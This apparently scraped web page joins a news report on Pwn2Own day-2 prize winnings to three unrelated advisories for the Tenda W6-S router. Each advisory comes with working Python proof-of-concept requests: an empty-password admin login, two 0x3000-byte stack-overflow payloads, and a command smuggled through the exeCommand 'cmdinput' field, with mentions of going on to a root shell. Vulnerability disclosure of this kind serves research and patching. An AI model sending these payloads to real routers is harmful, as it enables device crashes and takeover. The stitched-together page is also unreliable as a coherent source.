With 26 contestants signing up for 66 exploits, ZDI decided that the full cash prize would be awarded to the first winner of each target, with subsequent exploits getting 50% of the prize money. 

**DAY 2 PROCEEDINGS**

On the second day of the competition, participants earned a total of more than $280,000 for their exploits. A large sum of the total amount was earned by targeting the smart speaker, specific vulnerabilities in the Sonos One smart speakers. 

$60,000 went to a team from Qrious Secure for hacking a Sonos One speaker while $22,500 went to the Star Labs team for an exploit that involved targeting one new and one previously known flaw. 

The Bugscale team earned $37,500 for a SOHO Smashup exploit targeting a Synology router and an HP printer where again, new and previously known bugs were used. 

Another significant reward was earned by researcher Luca Moro, who was awarded $40,000 for a WD My Cloud Pro hack in the NAS category. Interrupt Labs earned $25,000 for hacking a Samsung Galaxy S22 phone.

The list of devices hacked on the **second day of Pwn2Own**, for which participants earned between $1,250 and $10,000, includes HP, Lexmark, Canon printers, Netgear, Synology, and TP-Link routers.

ZDI announced that a total of $681,000 was paid out in the first two days for 43 new and unique vulnerabilities. As the event progresses successfully, we look forward to it serving as a beacon to improve the relationship between vendors and independent researchers. 

1.  **Firefox, Edge, Safari, Tesla & VMware pwned at Pwn2Own**
2.  **Pwn2Own 2022 – Windows 11, MS Teams and Firefox Pwned**
3.  **Mobile Pwn2Own: Hackers pwn iPhone, Huawei, Galaxy & Pixel**
4.  **MS Exchange server, Teams, Zoom, Chrome pwned at Pwn2Own**
5.  **Pwn2Own: Xiaomi, Amazon Echo, Sony & Samsung** **Smart** **TVs pwned**

Pwn2Own Day 1 and 2: Samsung, HP, MikroTik & Netgear Pwned

Tenda W6-S v1.0.0.4(510) was discovered to contain a stack overflow via the linkEn parameter at /goform/setAutoPing.

Permalink

**Tenda W6-S V1.0.0.4(510) Stack overflow vulnerability****Firmware information**

*   Manufacturer's address：https://www.tenda.com.cn/
    
*   Firmware download address ： https://www.tenda.com.cn/download/detail-2627.html
    

**Affected version**

**Vulnerability details**

In /goform/setAutoPing, when linkEn is 1, ping1 and ping2 will be spliced into v9 by sprintf. It is worth noting that there is no size check which leads to a stack overflow vulnerability.

**Poc**

import requests

target\_url \= 'http://192.168.10.105/login/Auth'

target\_headers \= {'Host' : '192.168.10.105',
'Content-Length' : '65',
'Accept' : '\*/\*',
'X-Requested-With' : 'XMLHttpRequest',
'User-Agent' : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36',
'Content-Type' : 'application/x-www-form-urlencoded; charset=UTF-8',
'Origin' : 'http://192.168.10.105',
'Referer' : 'http://192.168.10.105/main.html',
'Accept-Encoding' : 'gzip, deflate',
'Accept-Language' : 'en-US,en;q=0.9',
'Cookie' : 'user=',
'Connection' : 'close'}
p1 \= 'usertype=admin&password=&time=2022;7;6;14;9;6&username='

requests.post(target\_url, headers \= target\_headers, data \= p1, verify \= False, timeout \= 1)

target\_url \= 'http://192.168.10.105/goform/setAutoPing'

target\_headers \= {'Host' : '192.168.10.105',
'Content-Length' : '295',
'Accept' : '\*/\*',
'X-Requested-With' : 'XMLHttpRequest',
'User-Agent' : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36',
'Content-Type' : 'application/x-www-form-urlencoded; charset=UTF-8',
'Origin' : 'http://192.168.10.105',
'Referer' : 'http://192.168.10.105/main.html',
'Accept-Encoding' : 'gzip, deflate',
'Accept-Language' : 'en-US,en;q=0.9',
'Cookie' : 'user=',
'Connection' : 'close'}

p2 \= 'linkEn=1&ping1=' + 'a' \* 0x3000
requests.post(target\_url, headers \= target\_headers, data \= p2, verify \= False, timeout \= 1)

After sending the poc, the router will crash, and finally we can write the exp to get the root shell

CVE-2022-45503: IOT_Vul/readme.md at main · z1r00/IOT_Vul

Tenda W6-S v1.0.0.4(510) was discovered to contain a stack overflow via the wl_radio parameter at /goform/WifiMacFilterGet.

**Tenda W6-S V1.0.0.4(510) Stack overflow vulnerability****Firmware information**

*   Manufacturer's address：https://www.tenda.com.cn/
    
*   Firmware download address ： https://www.tenda.com.cn/download/detail-2627.html
    

**Affected version**

**Vulnerability details**

In /goform/WifiMacFilterGet, when wl\_radio is 0, the index will be spliced into v6 by sprintf. It is worth noting that there is no size check, which leads to a stack overflow vulnerability.

**Poc**

import requests

target\_url \= 'http://192.168.10.105/login/Auth'

target\_headers \= {'Host' : '192.168.10.105',
'Content-Length' : '65',
'Accept' : '\*/\*',
'X-Requested-With' : 'XMLHttpRequest',
'User-Agent' : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36',
'Content-Type' : 'application/x-www-form-urlencoded; charset=UTF-8',
'Origin' : 'http://192.168.10.105',
'Referer' : 'http://192.168.10.105/main.html',
'Accept-Encoding' : 'gzip, deflate',
'Accept-Language' : 'en-US,en;q=0.9',
'Cookie' : 'user=',
'Connection' : 'close'}
p1 \= 'usertype=admin&password=&time=2022;7;6;14;9;6&username='

requests.post(target\_url, headers \= target\_headers, data \= p1, verify \= False, timeout \= 1)

target\_url \= 'http://192.168.10.105/goform/WifiMacFilterGet'

target\_headers \= {'Host' : '192.168.10.105',
'Content-Length' : '295',
'Accept' : '\*/\*',
'X-Requested-With' : 'XMLHttpRequest',
'User-Agent' : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36',
'Content-Type' : 'application/x-www-form-urlencoded; charset=UTF-8',
'Origin' : 'http://192.168.10.105',
'Referer' : 'http://192.168.10.105/main.html',
'Accept-Encoding' : 'gzip, deflate',
'Accept-Language' : 'en-US,en;q=0.9',
'Cookie' : 'user=',
'Connection' : 'close'}

p2 \= 'wl\_radio=0&index=' + 'a' \* 0x3000
requests.post(target\_url, headers \= target\_headers, data \= p2, verify \= False, timeout \= 1)

After sending the poc, the router will crash, and finally we can write the exp to get the root shell

CVE-2022-45499: IOT_Vul/readme.md at main · z1r00/IOT_Vul

Tenda W6-S v1.0.0.4(510) was discovered to contain a command injection vulnerability in the tpi_get_ping_output function at /goform/exeCommand.

**Tenda W6-S V1.0.0.4(510) command injection vulnerability****Firmware information**

*   Manufacturer's address：https://www.tenda.com.cn/
    
*   Firmware download address ： https://www.tenda.com.cn/download/detail-2627.html
    

**Affected version**

**Vulnerability details**

In /goform/exeCommand, cmdinput is controlled by the user, it will be copied to s by vos\_strcpy, and finally tpi\_get\_ping\_output will be called to execute the command, which is not restricted, resulting in a command injection vulnerability

**Poc**

import requests

target\_url \= 'http://192.168.10.105/login/Auth'

target\_headers \= {'Host' : '192.168.10.105',
'Content-Length' : '65',
'Accept' : '\*/\*',
'X-Requested-With' : 'XMLHttpRequest',
'User-Agent' : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36',
'Content-Type' : 'application/x-www-form-urlencoded; charset=UTF-8',
'Origin' : 'http://192.168.10.105',
'Referer' : 'http://192.168.10.105/main.html',
'Accept-Encoding' : 'gzip, deflate',
'Accept-Language' : 'en-US,en;q=0.9',
'Cookie' : 'user=',
'Connection' : 'close'}
p1 \= 'usertype=admin&password=&time=2022;7;6;14;9;6&username='

requests.post(target\_url, headers \= target\_headers, data \= p1, verify \= False, timeout \= 1)

target\_url \= 'http://192.168.10.105/goform/exeCommand'

target\_headers \= {'Host' : '192.168.10.105',
'Content-Length' : '295',
'Accept' : '\*/\*',
'X-Requested-With' : 'XMLHttpRequest',
'User-Agent' : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36',
'Content-Type' : 'application/x-www-form-urlencoded; charset=UTF-8',
'Origin' : 'http://192.168.10.105',
'Referer' : 'http://192.168.10.105/main.html',
'Accept-Encoding' : 'gzip, deflate',
'Accept-Language' : 'en-US,en;q=0.9',
'Cookie' : 'user=',
'Connection' : 'close'}

p2 \= 'cmdinput=asd;ls -la . > ./tmp/test;aa'

requests.post(target\_url, headers \= target\_headers, data \= p2, verify \= False, timeout \= 1)

You can see that the command was executed successfully, and finally you can write exp to get the root shell

Tag

#apple